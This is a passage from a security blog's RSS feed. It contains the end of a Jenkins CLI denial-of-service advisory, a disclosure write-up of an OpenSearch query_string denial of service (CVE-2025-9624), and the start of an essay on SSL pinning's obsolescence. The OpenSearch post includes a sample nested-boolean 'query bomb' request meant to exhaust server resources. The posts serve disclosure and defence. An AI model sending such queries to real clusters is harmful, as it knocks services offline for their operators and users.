&lt;li&gt;&lt;code&gt;ServerSideImpl.run&lt;/code&gt; and &lt;code&gt;FullDuplexHttpService.upload&lt;/code&gt; adopted &lt;code&gt;CONNECTION_TIMEOUT&lt;/code&gt;-bounded waits with 1s wake-ups and DEBUG logs, so abandoned handshakes unwind instead of parking threads.&lt;/li&gt;
&lt;li&gt;&lt;code&gt;PlainCLIProtocol&lt;/code&gt; always calls &lt;code&gt;side.handleClose()&lt;/code&gt; in a &lt;code&gt;finally&lt;/code&gt; block, ensuring both halves tear down even on read errors or runtime exceptions.&lt;/li&gt;
&lt;li&gt;Regression coverage landed in &lt;code&gt;Security3630Test&lt;/code&gt; (JUnit 5): it shrinks the CLI timeout for tests, exercises the previous race with concurrent CLI invocations, and asserts threads are released after truncated streams.&lt;/li&gt;
&lt;li&gt;Net effect: the CLI download/upload pairing now fails fast and frees Jetty threads instead of blocking indefinitely on missing counterparts.&lt;/li&gt;
&lt;li&gt;The changes bring the full-duplex CLI path back into compliance with &lt;a href=&quot;https://db.fluidattacks.com/req/337/&quot;&gt;REQ-337&lt;/a&gt;: “Make critical logic flows thread safe.”&lt;/li&gt;
&lt;/ul&gt;
&lt;hr /&gt;
&lt;h2&gt;CVE and advisory references&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;SECURITY-3630 is assigned &lt;strong&gt;CVE-2025-67635&lt;/strong&gt; (CVSS 3.1: AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H). See the CNA record on &lt;a href=&quot;https://www.cve.org/CVERecord?id=CVE-2025-67635&quot;&gt;cve.org&lt;/a&gt; and the NIST entry on &lt;a href=&quot;https://nvd.nist.gov/vuln/detail/CVE-2025-67635&quot;&gt;NVD&lt;/a&gt; for canonical metadata.&lt;/li&gt;
&lt;li&gt;Jenkins’ official write-up: &lt;a href=&quot;https://www.jenkins.io/security/advisory/2025-12-10/#SECURITY-3630&quot;&gt;Jenkins Security Advisory 2025-12-10: SECURITY-3630&lt;/a&gt;.&lt;/li&gt;
&lt;/ul&gt;
&lt;hr /&gt;
&lt;h2&gt;Fix and hardening&lt;/h2&gt;
&lt;p&gt;If you cannot upgrade immediately:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Disable or firewall the plain CLI endpoint; prefer the WebSocket CLI with proper authentication.&lt;/li&gt;
&lt;li&gt;Lower Jetty thread caps only as a last resort (does not remove the bug).&lt;/li&gt;
&lt;li&gt;Monitor thread dumps for &lt;code&gt;CLIAction$ServerSideImpl.run&lt;/code&gt; and &lt;code&gt;FullDuplexHttpService.upload/download&lt;/code&gt; wait states.&lt;/li&gt;
&lt;/ul&gt;
&lt;hr /&gt;
&lt;h2&gt;Indicators of compromise&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;Repeated &lt;code&gt;IOException: No download side found for &amp;lt;uuid&amp;gt;&lt;/code&gt; in logs.&lt;/li&gt;
&lt;li&gt;Thread dumps showing many &lt;code&gt;TIMED_WAITING&lt;/code&gt; at &lt;code&gt;FullDuplexHttpService.download&lt;/code&gt; or &lt;code&gt;WAITING&lt;/code&gt; at &lt;code&gt;CLIAction$ServerSideImpl.run&lt;/code&gt; / &lt;code&gt;FullDuplexHttpService.upload&lt;/code&gt;.&lt;/li&gt;
&lt;li&gt;Spikes in &lt;code&gt;/cli?remoting=false&lt;/code&gt; requests lacking authentication headers.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Patch promptly: this is a cheap, network-reachable DoS path in default Jenkins deployments.&lt;/p&gt;
</content:encoded></item><item><title>CVE-2025-9624: Nested Boolean/Disjunction Asymmetric DoS in Amazon&apos;s OpenSearch query_string - Chick</title><link>http://caverav.cl/posts/opensearch-dos/opensearch-dos/</link><guid isPermaLink="true">http://caverav.cl/posts/opensearch-dos/opensearch-dos/</guid><description>How I found CVE-2025-9624, an asymmetric Denial of Service in Amazon&apos;s OpenSearch&apos;s query_string handling, and how it was fixed with search.query.max_query_string_length.</description><pubDate>Tue, 25 Nov 2025 00:00:00 GMT</pubDate><content:encoded>&lt;h2&gt;TL;DR&lt;/h2&gt;
&lt;p&gt;While testing OpenSearch 3.2.0, I found an &lt;strong&gt;asymmetric Denial of
Service (DoS)&lt;/strong&gt; condition in how the engine handles &lt;code&gt;query_string&lt;/code&gt;
queries.&lt;/p&gt;
&lt;p&gt;By crafting Lucene-style inputs that &lt;strong&gt;nest boolean operators
and disjunctions&lt;/strong&gt;, it&apos;s possible to build huge query trees that stay
under OpenSearch&apos;s per-node clause limits but &lt;strong&gt;explode the overall
number of nodes&lt;/strong&gt;. The result is excessive CPU usage and heap pressure
during query parsing, rewriting, and scoring, eventually leading to the
process being killed by the OS or container orchestrator (e.g., exit
code &lt;code&gt;137&lt;/code&gt;).&lt;/p&gt;
&lt;p&gt;This issue was assigned &lt;strong&gt;CVE-2025-9624&lt;/strong&gt; and classified under
&lt;strong&gt;CWE-674: Uncontrolled Recursion&lt;/strong&gt;. It affects OpenSearch where
&lt;code&gt;query_string&lt;/code&gt; inputs from potentially untrusted sources can reach the
cluster without an upper bound on complexity. After discussion with Amazon&apos;s OpenSearch team, the problem was fixed by
introducing a new cluster-wide setting:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;search.query.max_query_string_length
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;which rejects overly long query strings early in the parsing stage.&lt;/p&gt;
&lt;p&gt;If you expose &lt;code&gt;query_string&lt;/code&gt; to untrusted or semi-trusted clients, you
should:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Upgrade to OpenSearch 3.3.0 or later&lt;/strong&gt;.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Configure a reasonable &lt;code&gt;search.query.max_query_string_length&lt;/code&gt;
value&lt;/strong&gt; for your environment.&lt;/li&gt;
&lt;li&gt;Avoid letting arbitrary users send raw Lucene-style &lt;code&gt;query_string&lt;/code&gt;
input when a safer DSL or templated queries would do.&lt;/li&gt;
&lt;/ul&gt;
&lt;hr /&gt;
&lt;h2&gt;Background: OpenSearch, query_string and Clause Limits&lt;/h2&gt;
&lt;p&gt;OpenSearch is built on top of Apache Lucene and exposes multiple ways to
express queries:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Structured JSON DSL (e.g., &lt;code&gt;bool&lt;/code&gt;, &lt;code&gt;term&lt;/code&gt;, &lt;code&gt;range&lt;/code&gt;).&lt;/li&gt;
&lt;li&gt;Higher-level helpers like &lt;code&gt;multi_match&lt;/code&gt;.&lt;/li&gt;
&lt;li&gt;The &lt;strong&gt;&lt;code&gt;query_string&lt;/code&gt;&lt;/strong&gt; query, which lets users write Lucene-style
strings such as:&lt;/li&gt;
&lt;/ul&gt;
&lt;pre&gt;&lt;code&gt;(title:security OR description:&quot;denial of service&quot;) AND product:opensearch
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The &lt;code&gt;query_string&lt;/code&gt; query is convenient, but it&apos;s also dangerous when
users can control it. It has to:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;Parse the string into a query tree.&lt;/li&gt;
&lt;li&gt;Expand field lists (multi-field queries).&lt;/li&gt;
&lt;li&gt;Build Lucene queries like &lt;code&gt;BooleanQuery&lt;/code&gt;, &lt;code&gt;DisjunctionMaxQuery&lt;/code&gt;,
&lt;code&gt;PhraseQuery&lt;/code&gt;, and others.&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;To prevent runaway queries, OpenSearch already had &lt;strong&gt;clause limits&lt;/strong&gt;:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;code&gt;indices.query.bool.max_clause_count&lt;/code&gt; caps the number of clauses
&lt;strong&gt;per &lt;code&gt;BooleanQuery&lt;/code&gt; node&lt;/strong&gt;.&lt;/li&gt;
&lt;li&gt;Internally, &lt;code&gt;IndexSearcher.setMaxClauseCount(...)&lt;/code&gt; enforces a limit
to avoid pathological boolean expressions.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;However, this limit is &lt;strong&gt;local to each boolean node&lt;/strong&gt;. It does &lt;strong&gt;NOT&lt;/strong&gt;
cap:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;The &lt;strong&gt;total number of nodes&lt;/strong&gt; in the query tree.&lt;/li&gt;
&lt;li&gt;The &lt;strong&gt;fan-out of non-boolean containers&lt;/strong&gt;, such as
&lt;code&gt;DisjunctionMaxQuery&lt;/code&gt;, which are commonly used to aggregate
multi-field expansions.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;That gap is what made CVE-2025-9624 possible.&lt;/p&gt;
&lt;hr /&gt;
&lt;h2&gt;The Vulnerable Design&lt;/h2&gt;
&lt;h3&gt;Per-node limits, global problem&lt;/h3&gt;
&lt;p&gt;At a high level, the vulnerable behavior can be summarized as:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;OpenSearch enforces &lt;code&gt;indices.query.bool.max_clause_count&lt;/code&gt; &lt;strong&gt;per
&lt;code&gt;BooleanQuery&lt;/code&gt;&lt;/strong&gt;.&lt;/li&gt;
&lt;li&gt;The &lt;strong&gt;&lt;code&gt;query_string&lt;/code&gt; parser&lt;/strong&gt; and related builders can create &lt;strong&gt;deep
trees&lt;/strong&gt; of booleans and disjunctions.&lt;/li&gt;
&lt;li&gt;Other containers, like &lt;strong&gt;&lt;code&gt;DisjunctionMaxQuery&lt;/code&gt;&lt;/strong&gt;, are &lt;strong&gt;not
bounded&lt;/strong&gt; by the boolean clause limit.&lt;/li&gt;
&lt;li&gt;There is &lt;strong&gt;no global cap&lt;/strong&gt; on overall query size or node count.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;This means an attacker can construct queries where:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;No single boolean node&lt;/strong&gt; violates &lt;code&gt;max_clause_count&lt;/code&gt;.&lt;/li&gt;
&lt;li&gt;But &lt;strong&gt;the entire tree&lt;/strong&gt; still becomes enormous, consuming CPU and
heap during:
&lt;ul&gt;
&lt;li&gt;Parsing&lt;/li&gt;
&lt;li&gt;Rewrite phases&lt;/li&gt;
&lt;li&gt;Scoring and relevance calculation&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;Asymmetric DoS in practice&lt;/h3&gt;
&lt;p&gt;This is an &lt;strong&gt;asymmetric DoS&lt;/strong&gt; because:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;The attacker&apos;s &lt;strong&gt;cost is tiny&lt;/strong&gt;: a single crafted &lt;code&gt;_search&lt;/code&gt; request
with a &quot;large&quot; &lt;code&gt;query_string&lt;/code&gt; value with nested boolean/disjunction operations.&lt;/li&gt;
&lt;li&gt;The defender&apos;s &lt;strong&gt;cost is huge&lt;/strong&gt;: OpenSearch spends significant CPU
and memory processing that query before failing.&lt;/li&gt;
&lt;/ul&gt;
&lt;hr /&gt;
&lt;h2&gt;Building the Query Bomb&lt;/h2&gt;
&lt;p&gt;The key observation was that I could &lt;strong&gt;grow the query tree
combinatorially&lt;/strong&gt; while keeping each boolean node &quot;small&quot;.&lt;/p&gt;
&lt;p&gt;A simplified example of the pattern looks like:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;GET _search
{
  &quot;query&quot;: {
    &quot;query_string&quot;: {
      &quot;query&quot;: &quot;winAd AND (rises OR rising) winAd AND (rises OR rising) winAd AND (rises OR rising) ...&quot;
    }
  }
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;By repeating and nesting groups, using multi-field expansions, and
keeping the boolean limits intact, the resulting Lucene structure
becomes massive.&lt;/p&gt;
&lt;hr /&gt;
&lt;h2&gt;Reproducing the Issue&lt;/h2&gt;
&lt;p&gt;&lt;img src=&quot;https://framerusercontent.com/images/ZvYdvVnTurfoL0QqzsG5uwvGDk.png?width=3372&amp;amp;height=1886&quot; alt=&quot;&quot; /&gt;&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://framerusercontent.com/images/vdkSofwRAT9EL6669pvmm4F2fw.png?width=3326&amp;amp;height=1584&quot; alt=&quot;&quot; /&gt;&lt;/p&gt;
&lt;p&gt;Effects observed:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;CPU spikes&lt;/li&gt;
&lt;li&gt;Heavy GC pressure&lt;/li&gt;
&lt;li&gt;Process termination in some runs (exit code &lt;code&gt;137&lt;/code&gt;/OOMKilled)&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;Demo (video)&lt;/h3&gt;
&lt;p&gt;&amp;lt;iframe src=&quot;https://www.youtube.com/embed/Z06POBsayqM&quot; title=&quot;OpenSearch query_string DoS (CVE-2025-9624) demo&quot; width=&quot;100%&quot; height=&quot;360&quot; allowfullscreen loading=&quot;lazy&quot;&amp;gt;&amp;lt;/iframe&amp;gt;
Direct link: https://youtu.be/Z06POBsayqM&lt;/p&gt;
&lt;hr /&gt;
&lt;h2&gt;Impact Assessment&lt;/h2&gt;
&lt;p&gt;CVSS v4.0 score: &lt;strong&gt;8.3 (High)&lt;/strong&gt;&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:H
&lt;/code&gt;&lt;/pre&gt;
&lt;hr /&gt;
&lt;h2&gt;Root Cause&lt;/h2&gt;
&lt;p&gt;The issue stems from &lt;strong&gt;local limits without global bounds&lt;/strong&gt;. Boolean
node limits do not restrict the total query tree size. Multi-field
expansions and disjunctions multiply complexity until the engine
collapses under CPU/memory pressure.&lt;/p&gt;
&lt;p&gt;This matches &lt;strong&gt;CWE-674: Uncontrolled Recursion&lt;/strong&gt;.&lt;/p&gt;
&lt;hr /&gt;
&lt;h2&gt;The Fix: &lt;code&gt;search.query.max_query_string_length&lt;/code&gt;&lt;/h2&gt;
&lt;p&gt;OpenSearch PR #19491 added:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;search.query.max_query_string_length
&lt;/code&gt;&lt;/pre&gt;
&lt;ul&gt;
&lt;li&gt;Default: &lt;strong&gt;32,000&lt;/strong&gt;&lt;/li&gt;
&lt;li&gt;Enforced early in &lt;code&gt;QueryStringQueryParser.parse(...)&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;Rejects overly long &lt;code&gt;query_string&lt;/code&gt; values before parsing and
expansion&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Included starting in &lt;strong&gt;OpenSearch 3.3&lt;/strong&gt;.&lt;/p&gt;
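&lt;p&gt;Conceptually, the mitigation is a length gate applied before any parsing work. The Python sketch below illustrates that shape only (the function and constant names are invented; the real enforcement lives in &lt;code&gt;QueryStringQueryParser.parse(...)&lt;/code&gt; and is configured via the cluster setting):&lt;/p&gt;

```python
# Hypothetical sketch of the mitigation shape: reject over-long
# query_string input before any parsing or field expansion happens.
# 32,000 mirrors the documented default of
# search.query.max_query_string_length in OpenSearch 3.3.
MAX_QUERY_STRING_LENGTH = 32_000

def parse_query_string(query):
    if len(query) > MAX_QUERY_STRING_LENGTH:
        # Fail fast: no CPU or heap is spent on the query tree.
        raise ValueError('query_string exceeds max_query_string_length')
    return query  # placeholder for the actual parse

assert parse_query_string('title:security') == 'title:security'
try:
    parse_query_string('a' * (MAX_QUERY_STRING_LENGTH + 1))
    raised = False
except ValueError:
    raised = True
assert raised
```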
&lt;p&gt;I want to publicly thank Amazon&apos;s OpenSearch team for their professional triage and transparency throughout this vulnerability report.&lt;/p&gt;
&lt;hr /&gt;
&lt;h2&gt;Defensive Recommendations&lt;/h2&gt;
&lt;ol&gt;
&lt;li&gt;&lt;strong&gt;Upgrade to 3.3.0+&lt;/strong&gt;&lt;/li&gt;
&lt;li&gt;Set a stricter &lt;code&gt;search.query.max_query_string_length&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;Avoid exposing raw &lt;code&gt;query_string&lt;/code&gt; to untrusted clients&lt;/li&gt;
&lt;li&gt;Apply rate limiting and monitor heavy queries&lt;/li&gt;
&lt;/ol&gt;
&lt;hr /&gt;
&lt;h2&gt;Disclosure Timeline&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;2025-09-04&lt;/strong&gt; -- Issue reported&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;2025-09-17&lt;/strong&gt; -- Confirmed by OpenSearch team&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;2025-10-01&lt;/strong&gt; -- Fix merged&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;2025-10-14&lt;/strong&gt; -- OpenSearch 3.3 released&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;2025-11-25&lt;/strong&gt; -- Public disclosure (Fluid Attacks + CVE
publication)&lt;/li&gt;
&lt;/ul&gt;
&lt;hr /&gt;
&lt;h2&gt;References&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;https://fluidattacks.com/advisories/chick&lt;/li&gt;
&lt;li&gt;https://www.cve.org/CVERecord?id=CVE-2025-9624&lt;/li&gt;
&lt;li&gt;https://nvd.nist.gov/vuln/detail/CVE-2025-9624&lt;/li&gt;
&lt;li&gt;https://github.com/opensearch-project/OpenSearch/pull/19491&lt;/li&gt;
&lt;li&gt;https://opensearch.org/blog/explore-opensearch-3-3/&lt;/li&gt;
&lt;/ul&gt;
</content:encoded></item><item><title>The Obsolescence of SSL Pinning in Mobile App Security</title><link>http://caverav.cl/posts/ssl-pinning/ssl-pinning/</link><guid isPermaLink="true">http://caverav.cl/posts/ssl-pinning/ssl-pinning/</guid><pubDate>Mon, 01 Sep 2025 00:00:00 GMT</pubDate><content:encoded>&lt;h1&gt;TL;DR&lt;/h1&gt;
&lt;p&gt;This blog post is &lt;strong&gt;dense and time-consuming&lt;/strong&gt; to read in full.&lt;br /&gt;
If you just need the essentials:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;SSL pinning is obsolete:&lt;/strong&gt; Google, Apple, OWASP, and Cloudflare all discourage its use except in rare cases.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Why?&lt;/strong&gt; It&apos;s fragile (breaks when certificates rotate), high-maintenance, gives a false sense of security (easily bypassed with tools like Frida), and can cause outages or compatibility failures (especially in enterprise networks).&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Better alternatives in 2025:&lt;/strong&gt; rely on the default PKI trust stores, enable Certificate Transparency, enforce HSTS, use strong TLS configs, leverage DNS CAA, and monitor your certificates.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Bottom line:&lt;/strong&gt; Don&apos;t pin unless you have a niche regulatory or extreme threat model that requires it, and if you do, plan very carefully for rotation.&lt;/li&gt;
&lt;/ul&gt;
&lt;hr /&gt;
&lt;h2&gt;Introduction&lt;/h2&gt;
&lt;p&gt;SSL pinning (also known as certificate pinning) is a technique that gained popularity in mobile app
security as a way to harden HTTPS connections against man-in-the-middle (MITM) attacks. The basic
idea is simple: instead of trusting all certificate authorities (CAs) in the device&apos;s trust store, the app only
trusts a specific certificate or public key that it &quot;pins&quot; as valid. In theory, this ensures the app connects
only to a server presenting the expected certificate, even if a rogue or compromised CA were to issue a
fraudulent certificate for the server&apos;s domain. For years, Android and iOS developers
implemented SSL pinning in banking, finance, and other security-sensitive apps to guarantee they were
talking to the genuine backend server and not an impostor.&lt;/p&gt;
&lt;p&gt;However, the mobile security landscape has evolved. Major platform maintainers and industry experts
now discourage the use of SSL pinning except in very special cases. What was once considered a best
practice is increasingly seen as an outdated mechanism that can create more problems than it solves. In
this post, we&apos;ll explore what SSL pinning is, why it was historically used, and the technical reasons it&apos;s
now viewed as obsolete. We&apos;ll also cite official guidance from Google and Apple advising against
pinning, discuss real-world issues pinning causes for developers and testers, and outline modern best
practices to secure HTTPS in mobile apps today (from certificate transparency to HSTS and beyond).&lt;/p&gt;
&lt;h2&gt;What Is SSL Pinning in Mobile Apps?&lt;/h2&gt;
&lt;p&gt;SSL pinning refers to configuring an application to accept only a predefined TLS certificate or public
key when establishing secure connections. In a typical TLS handshake, the client (app) trusts any server
certificate signed by a trusted CA (Certificate Authority) in the system&apos;s trust store. With pinning, the
developer narrows this trust: the app stores or &quot;pins&quot; a specific server certificate (or its public key or the
issuing CA&apos;s key) and will reject all others, even if they are otherwise valid.&lt;/p&gt;
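&lt;p&gt;Conceptually, a pin is just a digest of the expected key material: the client hashes the server&apos;s public key (usually the DER-encoded SubjectPublicKeyInfo, or SPKI) and compares the result against a hardcoded allow-list. A minimal Python sketch of that comparison (the pinned value here is a placeholder, not a real server key):&lt;/p&gt;

```python
import base64
import hashlib

# Hypothetical allow-list: base64(SHA-256(DER-encoded SPKI)).
# Real apps ship one or more of these hashes inside the binary.
PINNED_SPKI_HASHES = {"47DEQpj8HBSa+/TImW+5JCeuQeRkm5NMpJWZG3hSuFU="}

def spki_pin(spki_der):
    """Compute the pin string for a DER-encoded public key."""
    digest = hashlib.sha256(spki_der).digest()
    return base64.b64encode(digest).decode("ascii")

def connection_allowed(spki_der):
    """A pinned client rejects any key whose pin is not on the list."""
    return spki_pin(spki_der) in PINNED_SPKI_HASHES
```

&lt;p&gt;Note that the allow-list is baked into the shipped binary, so any key rotation on the server side requires shipping, and users adopting, a new app build.&lt;/p&gt;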
&lt;p&gt;In practice, mobile developers have implemented pinning in a few ways:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;In Android:&lt;/strong&gt;&lt;br /&gt;
Historically via custom &lt;code&gt;TrustManager&lt;/code&gt; implementations that check the server&apos;s
certificate against a known good certificate or public key. Modern Android apps can use &lt;a href=&quot;https://developer.android.com/privacy-and-security/security-config#:~:text=%2A%20Cleartext%20traffic%20opt,secure%20connection%20to%20particular%20certificates&quot;&gt;Network
Security Configuration&lt;/a&gt; (an XML config) to enforce pinning for specific domains without writing
code. For example, developers might include the SHA-256 hashes of the allowed certificates
in the config. Libraries like OkHttp also provided a &lt;code&gt;CertificatePinner&lt;/code&gt; utility for pinning in
code. These approaches ensure the app only trusts the specified certs.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;In iOS:&lt;/strong&gt;&lt;br /&gt;
Commonly by implementing the &lt;code&gt;URLSessionDelegate&lt;/code&gt; method
&lt;code&gt;urlSession(_:didReceive:completionHandler:)&lt;/code&gt; to intercept the server&apos;s authentication challenge and verify the certificate
matches a bundled certificate or key. More recently, iOS 14+ introduced a declarative pinning
capability via the app&apos;s &lt;code&gt;Info.plist&lt;/code&gt; (App Transport Security settings). Developers can list domains
under &lt;code&gt;NSAppTransportSecurity &amp;gt; NSPinnedDomains&lt;/code&gt; with one or more
&lt;code&gt;NSPinnedCAIdentities&lt;/code&gt; or public key hashes to pin the server&apos;s identity. This &quot;identity
pinning&quot; is native support for SSL pinning on Apple platforms.&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
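&lt;p&gt;As a concrete illustration of the Android configuration approach, a Network Security Configuration pin-set looks roughly like this (the domain and hashes are placeholders; the &lt;code&gt;pin-set&lt;/code&gt; syntax is documented in the Android developer guide linked above):&lt;/p&gt;

```xml
&amp;lt;network-security-config&amp;gt;
    &amp;lt;domain-config&amp;gt;
        &amp;lt;domain includeSubdomains="true"&amp;gt;api.example.com&amp;lt;/domain&amp;gt;
        &amp;lt;pin-set expiration="2026-01-01"&amp;gt;
            &amp;lt;pin digest="SHA-256"&amp;gt;7HIpactkIAq2Y49orFOOQKurWxmmSFZhBCoQYcRhJ3Y=&amp;lt;/pin&amp;gt;
            &amp;lt;!-- Backup pin for a key you control but have not yet deployed --&amp;gt;
            &amp;lt;pin digest="SHA-256"&amp;gt;fwza0LRMXouZHRC8Ei+4PyuldPDcf3UKgO/04cDM1oE=&amp;lt;/pin&amp;gt;
        &amp;lt;/pin-set&amp;gt;
    &amp;lt;/domain-config&amp;gt;
&amp;lt;/network-security-config&amp;gt;
```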
&lt;p&gt;By using these techniques, an app tightens the TLS verification beyond the default. If an attacker or
malicious network presents any certificate that isn&apos;t the one the app expects (even if it&apos;s otherwise valid
or signed by a public CA), the connection is aborted. This was seen as an extra layer of defense on top of
the standard HTTPS validation.&lt;/p&gt;
&lt;h2&gt;Original Benefits and Motivations for SSL Pinning&lt;/h2&gt;
&lt;p&gt;When SSL pinning was first adopted, it addressed real concerns about the trustworthiness of CAs and
the potential for MITM attacks via rogue certificates. Some key motivations and perceived benefits
were:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Protection Against Malicious CAs or Misissued Certificates:&lt;/strong&gt;&lt;br /&gt;
In the past, there were incidents where CAs were breached or tricked into issuing certificates to impostors (for example, the DigiNotar and Comodo breaches in 2011 led to fraudulent certificates for major domains). Pinning gave developers peace of mind that even if a malicious or compromised CA issued a cert for their API domain, the app would reject it because it wasn&apos;t the exact cert/key that was pinned. This narrowed the trust scope to only the known server identity.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Mitigating User-Installed or Device CAs:&lt;/strong&gt;&lt;br /&gt;
Mobile devices can have user-added root certificates (Android versions before 7 trusted user-added CAs by default). Attackers or malware could potentially install a fake root CA on a device to intercept traffic. With pinning, the app ignores any such new CAs; it trusts only the pinned cert, preventing MITM via locally installed malicious roots. Similarly, corporate or public Wi-Fi networks that hijack traffic with their own trusted proxy cert would be blocked by pinning (only the real server cert passes).&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Ensuring Exactly the Right Server:&lt;/strong&gt;&lt;br /&gt;
Pinning was appealing for high-security apps (banking, payments, healthcare) as a form of &quot;lockdown&quot;: you know exactly which server or CA your app should talk to. By hardcoding that trust, developers aimed to reduce the attack surface. It&apos;s a bit of a belt-and-suspenders approach: even if the default PKI ecosystem were to falter, the pinned cert or key remains as an uncompromised source of truth.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Preventing Silent Fail-open Scenarios:&lt;/strong&gt;&lt;br /&gt;
In a normal TLS scenario, if a certificate is untrusted, the connection fails, but some developers feared advanced attackers could somehow trick users into bypassing warnings. In mobile apps, there typically is no interactive warning (the app either connects or it doesn&apos;t), so pinning was seen as a way to guarantee no unexpected certs are accepted under the hood. The app&apos;s logic would simply refuse anything except the known good certificate, with no option to proceed otherwise.&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;These benefits made SSL pinning a widely recommended practice for a time. Security guides often
listed certificate pinning as an important control to prevent advanced MITM attacks. Many developers
implemented it hoping to gain an extra layer of security for sensitive data in transit, on top of TLS.&lt;br /&gt;
In summary, the original promise of pinning was &lt;strong&gt;improved security trust&lt;/strong&gt;, ensuring that a mobile app is
truly talking to its intended server and not an impostor, even in scenarios where the global CA system
might be undermined.&lt;/p&gt;
&lt;h2&gt;Why SSL Pinning Is No Longer Recommended&lt;/h2&gt;
&lt;p&gt;In recent years, consensus has shifted: the downsides of SSL pinning now clearly outweigh its benefits
in most cases. Both Google and Apple (stewards of Android and iOS) advise against using certificate
pinning for typical apps, and the broader security community considers pinning a fragile solution. Here
are the key reasons why SSL pinning is considered obsolete or inadvisable today:&lt;/p&gt;
&lt;h3&gt;Fragility and Risk of Outages&lt;/h3&gt;
&lt;p&gt;Pinning makes your app&apos;s connectivity tightly bound to a specific certificate or key, which will
inevitably change over time. Certificates expire (often yearly, as industry rules now cap their validity),
CAs may rotate or be replaced, or you might switch to a different certificate provider. When that
happens, a pinned app will break: it will refuse to connect to the server because the &quot;expected&quot; certificate changed.&lt;/p&gt;
&lt;p&gt;The only fix is to release an app update with the new pin, and all users must upgrade before connectivity is restored. This creates a serious risk of downtime.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&quot;If the pinned certificate changes due to renewal, revocation, or CA migration, the application will stop working until a new version of the app with an updated certificate is released,&quot;&lt;br /&gt;
as one 2025 analysis noted, meaning apps can suddenly break and critical services become unavailable until a fix is deployed and adopted.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Google&apos;s official Android guidance explicitly cautions that certificate pinning is not recommended because &quot;future server configuration changes, such as changing to another CA, will render apps with pinned certificates unable to connect to the server without a client software update.&quot;&lt;/p&gt;
&lt;p&gt;In other words, pinning couples your app to your current certificate infrastructure so tightly that any routine change becomes a potentially breaking change.&lt;/p&gt;
&lt;h3&gt;High Maintenance Overhead&lt;/h3&gt;
&lt;p&gt;Because of the fragility above, using pinning responsibly requires meticulous planning and maintenance. Developers need to anticipate certificate rotations and have processes in place to update pins proactively.&lt;/p&gt;
&lt;p&gt;Best practices for pinning call for including multiple backup pins (e.g. pinning to a set of public keys) and short pin lifetimes, in an attempt to mitigate the risk of lockout.&lt;/p&gt;
&lt;p&gt;Apple&apos;s documentation warns that if you do pin, you must &lt;em&gt;&quot;think long term&quot;&lt;/em&gt; and plan for both planned and unplanned certificate changes, including shipping app updates on short notice if something changes. Many teams simply do not have the operational rigor to manage this without error.&lt;/p&gt;
&lt;p&gt;Real-world incidents show that organizations often forget about pins they set. For example, Cloudflare observed a &lt;a href=&quot;https://blog.cloudflare.com/why-certificate-pinning-is-outdated/&quot;&gt;surge in customer outages in 2024&lt;/a&gt; after routine certificate authority changes, noting that&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&quot;almost all customers that were impacted by the change were unaware that they had a certificate pin in place.&quot;&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;&lt;img src=&quot;https://cf-assets.www.cloudflare.com/zkvhlag99gkb/1U4AFw29oL1GCcen93rnYr/5dea495d82170011725de472cfd7f98a/image4-4.png&quot; alt=&quot;Customer Outages&quot; /&gt;&lt;/p&gt;
